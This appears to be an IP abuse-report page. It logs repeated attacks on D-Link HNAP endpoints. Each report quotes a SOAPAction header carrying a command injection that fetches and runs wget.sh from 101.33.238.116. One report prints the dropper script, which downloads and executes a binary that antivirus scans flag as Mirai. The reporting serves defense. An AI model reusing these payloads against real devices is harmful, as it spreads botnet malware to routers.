Possibly hosting malicious download (shellcode, Mirai variant?) found in wget/nc command embedded in ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget/nc command embedded in HTTP request from 104.244.74.181 at:
Time: Fri, 03 Jun 2022 02:10:52 +0200
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Hacking
Exploited Host
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget/nc command embedded in ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget/nc command embedded in HTTP request from 104.244.74.181 at:
Time: Thu, 02 Jun 2022 23:22:12 +0200
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget/nc command embedded in ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget/nc command embedded in HTTP request from 104.244.74.181 at:
Time: Thu, 02 Jun 2022 04:14:58 +0200
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
[QUERY FROM: 107.189.12.133]
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd ...
show more[QUERY FROM: 107.189.12.133]
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
[wget.sh]
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://101.33.238.116/arm4;curl -O http://101.33.238.116/arm4;cat arm4 > brick;chmod +x *;./brick
[...]
[/wget.sh]
win.exe: Win.Malware.Farfli-7101089-0 FOUND
arm4: Unix.Dropper.Mirai-7135968-0 FOUND
mips: Unix.Dropper.Mirai-7135968-0 FOUND
arm6: Unix.Dropper.Mirai-7135968-0 FOUND
linux: Unix.Dropper.Mirai-7135968-0 FOUND
show less
Hacking
Exploited Host
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 107.189.30.158 at:
Time: Wed, 16 Feb 2022 13:50:55 +0100
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 104.244.78.190 at:
Time: Wed, 16 Feb 2022 11:27:45 +0100
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Hacking
Exploited Host
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 107.189.30.158 at:
Time: Wed, 16 Feb 2022 06:19:28 +0100
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Hacking
Exploited Host
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 107.189.28.51 at:
Time: Tue, 01 Feb 2022 06:52:45 +0100
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101.33.238.116/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Hacking
Exploited Host
Showing 1 to
15
of 25 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ